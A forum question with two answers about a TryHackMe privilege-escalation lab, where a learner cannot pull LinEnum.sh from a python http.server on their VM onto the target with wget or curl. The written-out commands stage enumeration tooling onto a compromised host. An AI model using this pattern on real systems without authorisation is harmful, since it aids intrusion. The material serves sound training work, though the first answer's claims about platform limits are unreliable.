# TryHackMe - Cannot download a file from http server

Tags: httpserver

I use my Linux VM machine, I am connected to openvpn on THM.

I am in ssh session with deployed machine (Common Linux Privesc Room) and I need to install there LinEnum.sh.

I've created a server with `python -m http.server 80` (I've tried 8000, too) in folder `/root/Documents/server/LinEnum/`.

When I am in ssh session, I can ping my machine but I cannot download that file with `wget 10.11.29.97:8000:8000/LinEnum.sh` either with `curl http://10.11.29.97:8000/LinEnum.sh --output LinEnum.sh`

Nothing happens, just try 1, try 2, ...

Server:

[image]
[image]

SSH:

[image]

Answer (score 0):

Actually Tryhackme don't give you to download files. The same thing I was confused many times. May be you can install tools if you have a subscription and obtained a kalibox(I'm not sure about that)

(** You're doing this in a attack box it won't support write permissions from unknown sources**)

The ping works because the two devices are on a same openvpn network

Answer (score 0):

Maybe a bit late but here's my suggestion:
Usually this should work, maybe try to not be root and let the owner of the LinEnum.sh file be kali, so no root permissions involved.

The command to change the owner of the file to kali is: `chown kali LinEnum.sh`.

To change the user to kali directly you use: `su kali`.

You could also try to use the `scp` command to directly send the file to the server, but that is only possible if you know the password of a user for ssh on that machine, but I know that those are given in that room.

Try to do that, and if it still doesn't work, then please respond to this answer, maybe I can help you with further issues.

But as I said, it should work like that, the only thing that is sometimes not possible to do is download online sources with wget from the Attackbox. But I always send LinEnum.sh from my local machine to the ssh machine.